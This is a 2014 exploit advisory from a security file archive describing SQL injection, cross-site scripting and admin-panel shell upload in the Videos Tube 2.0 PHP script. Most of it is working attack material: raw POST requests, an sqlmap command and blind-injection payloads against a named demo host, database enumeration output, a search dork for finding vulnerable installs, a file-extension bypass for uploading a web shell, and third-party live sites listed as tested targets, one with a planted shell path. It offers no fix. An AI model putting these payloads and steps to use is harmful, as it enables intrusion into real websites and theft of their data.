what you don't know can hurt you

Videos Tube 2.0 SQL Injection / XSS / Shell Upload

Videos Tube 2.0 SQL Injection / XSS / Shell Upload
Posted Nov 17, 2014
Authored by KnocKout

Videos Tube version 2.0 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss, sql injection
MD5 | 6536e71ea10be75e9c75ccb6371a5336

Videos Tube 2.0 SQL Injection / XSS / Shell Upload

Change Mirror Download
Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG -
[+] Greetz to : http://1337day.com - http://milw00rm.com
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
KnocKout, Septemb0x , BARCOD3 , _UnDeRTaKeR_
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ Turkey
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Videos Tube
|~Price : FREE
|~Version : 2.0, updated the lastest version.
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload
|~Google DORK : "© 2014, Videos Tube. Tüm Haklarý Saklýdýr."
|[~]Date : "15 KAS. 2014"
|[~]Tested on : Kali Linux

Tested on Demos;

http://demo.phpscriptlerim.com/free/videostube/
http://www.týger61.com/
http://www.birkovabuziddiasi.com/
http://video.egitimledirilis.com/

====================== SQL Injection Vulnerability (POST Method) ===============

Example; http://demo.phpscriptlerim.com/free/videostube/

Target: http://demo.phpscriptlerim.com/free/videostube/search.php

POST :/ search=[SQL Injection]&ara=

-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[Post Method SQL Injection]&ara=
..
..
##############Exploitation sqlmap console.##########
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs
####################################################
---
Place: POST
Parameter: search
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: search=-6400' OR (6785=6785)#&ara=

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: search=' AND SLEEP(5)#&ara=
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.34
back-end DBMS: MySQL 5.0.11
[01:16:58] [INFO] fetching database names
[01:16:58] [INFO] fetching number of databases
[01:16:58] [WARNING] reflective value(s) found and filtering out
[01:16:58] [INFO] resumed: 2
[01:16:58] [INFO] resumed: information_schema
[01:16:58] [INFO] resumed: phpscrip_videostube
available databases [2]:
[*] information_schema
[*] phpscrip_videostube
==============================================================================
==============================================================================
==================Cross Site Scripting Vulnerability =========================

Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST to :/ search=[XSS]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[XSS]&ara=

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============================================================================
==============================================================================
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======
INFO;

performed primarily access the admin panel ; http://www.TARGET.com/yonetim/

then go..
http://www.VICTIM.com/upload/upload.php
for bypass shell file name "name.php;.jpeg"
and then using tamper data file can be loaded shell was tested!


TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php

=============================================================

# milw00rm.com [2014-11-15]
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close